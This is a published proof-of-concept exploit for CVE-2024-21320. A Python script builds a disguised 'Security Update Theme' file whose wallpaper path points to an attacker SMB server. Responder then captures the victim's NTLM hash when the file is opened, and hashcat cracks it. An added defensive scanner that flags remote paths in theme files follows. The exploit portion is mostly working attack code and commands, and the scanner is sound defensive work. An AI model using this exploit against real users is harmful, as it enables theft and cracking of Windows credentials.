# Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
# Date: 02/03/2025
# Exploit Author: Abinesh Kamal K U
# CVE : CVE-2024-21320
# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320

## Step 1: Install Responder

Responder is a tool to capture NTLM hashes over SMB.

```
git clone https://github.com/lgandx/Responder.git
cd Responder
```

Replace `eth0` with your network interface.

## Step 2: Create a Malicious Windows Theme File

### Python Script to Generate the Malicious `.theme` File

```python
import os

# Attacker-controlled SMB server IP
attacker_smb_server = "192.168.1.100"  # Change this to your attacker's IP

# Name of the malicious theme file
theme_filename = "malicious.theme"

# Malicious .theme file content
theme_content = f"""
[Theme]
DisplayName=Security Update Theme

[Control Panel\\Desktop]
Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg

[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Write the theme file
with open(theme_filename, "w") as theme_file:
    theme_file.write(theme_content)

print(f"[+] Malicious theme file '{theme_filename}' created.")

# Optional: Start a Python HTTP server to serve the malicious theme file
start_http = input("Start HTTP server to deliver theme file? (y/n): ").strip().lower()
if start_http == "y":
    print("[+] Starting HTTP server on port 8080...")
    os.system("python3 -m http.server 8080")
```

## Step 3: Deliver & Capture NTLM Hashes

1. Send the `malicious.theme` file to the target.
2. Run Responder to capture the NTLM hash:

   ```
   sudo python3 Responder.py -I eth0
   ```

3. Wait for the victim to open the `.theme` file.
4. Extract the NTLM hash from the Responder logs and crack it using hashcat:

   ```
   hashcat -m 5600 captured_hashes.txt rockyou.txt
   ```

--
Abinesh Kamal K U
abineshjerry.info
MTech - Cyber Security Systems & Networks
Amrita University
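
For the defensive side of the technique above, an added example (not part of the original advisory or the author's code): a scanner that flags any value in a `.theme` file that points at a remote host, which is the reference that makes the client authenticate over SMB. It checks every key rather than only `Wallpaper` and also recognises `\\?\UNC\` and `file://host/` spellings, which goes beyond what the page shows; the function names and both sample themes are constructed for illustration.

```python
import re

# \\host\share or //host/share; the lookahead skips the local-device
# prefixes \\?\ and \\.\ so that \\?\C:\... is not reported.
UNC_RE = re.compile(r'^[\\/]{2}(?![?.][\\/])([^\\/\s]+)[\\/]')
# \\?\UNC\host\share is the long-path spelling of a remote path.
LONG_UNC_RE = re.compile(r'^[\\/]{2}[?.][\\/]UNC[\\/]([^\\/\s]+)', re.I)
# file://host/share has a host; file:///C:/... does not.
FILE_URL_RE = re.compile(r'^file:/{2}([^/\s]+)/', re.I)

def remote_host(value):
    """Return the remote host a theme value points at, or None if local."""
    value = value.strip().strip('"')
    for rx in (LONG_UNC_RE, UNC_RE, FILE_URL_RE):
        m = rx.match(value)
        if m:
            return m.group(1)
    return None

def scan_theme(text):
    """Return (section, key, host) for each value that names a remote host."""
    findings, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):   # blank line or INI comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        key, sep, value = line.partition("=")
        host = remote_host(value) if sep else None
        if host:
            findings.append((section, key.strip(), host))
    return findings

# Constructed samples: one with the layout shown on this page, one benign.
SUSPICIOUS = r"""
[Theme]
[Control Panel\Desktop]
Wallpaper=\\192.168.1.100\share\malicious.jpg
[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
"""
BENIGN = r"""
[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
"""

if __name__ == "__main__":
    for section, key, host in scan_theme(SUSPICIOUS):
        print(f"remote reference: [{section}] {key} -> {host}")
```

A check like this fits a mail or web gateway, or a sweep of download folders, to quarantine `.theme` files before a user opens them.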